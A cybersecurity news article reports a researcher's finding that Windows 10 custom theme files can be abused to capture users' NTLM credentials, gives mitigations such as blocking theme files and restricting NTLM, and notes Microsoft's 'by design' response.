CYBER NEWS

Custom Windows 10 Themes Can Be Abused To Steal User Credentials

A security researcher has discovered that Windows 10 themes can be used to steal users’ data using a technique called pass-the-hash. This is possible to a loophole found in the operating system that is used to allow the loading of custom themes.




Windows 10 Custom Themes Can Be Abused And Used To Steal Users Data

Windows 10 allows for the installation of custom themes by the users and this has recently been discovered to be an entry point for abuse. The warning came from the security researcher Jimmy Bayne who discovered a dangerous loophole that can be taken advantage of by hackers. This comes from the ability to install themes from a third-party site or repository. The expert notes that malicious users can take advantage of the ability to execute an attack model called Pass-The-Hash.

By design, this commands hackers to create themes with malware code that will execute a preset behavior sequence when the theme is activated. Upon doing so the users will be shown a prompt that will ask them to enter in their credentials. The theme will actually redirect the pages to a specially created web page that includes this form.

Related:
A new report shows that computer criminals are actively using the Binance platform in order to exchange the cryptocurrency received from ransomware fees
Ransomware Hackers Use Binance to Exchange Cryptocurrency Despite The Site’s Countermeasures

The .theme file which is associated with a given theme choice can be programmed to change the default wallpaper setting to a website. If the users enter their computer login credentials the will be forwarded to the hackers. Even though the information is stored in a secured NTLM hash it can easily be decrypted using special software. Such attacks are very dangerous when as they can be used in combination with other types of malware in coordinating advanced infections.

Possible countermeasures that computer administrators can take will be to restrict the installations by blocking the theme extensions files. When workgroup computers are concerned a group policy can b used to restrict the sending of NTLM credentials to remote hosts. However, this can interfere with some enterprise setups that use this approach for remote login. This information was reported to Microsoft however at this moment the issue will not be fixed as the company staff said that this is a “feature by design”.

Avatar

Martin Beltov

Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast he enjoys writing about the latest threats and mechanisms of intrusion.

More Posts - Website

Follow Me:
TwitterGoogle Plus

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...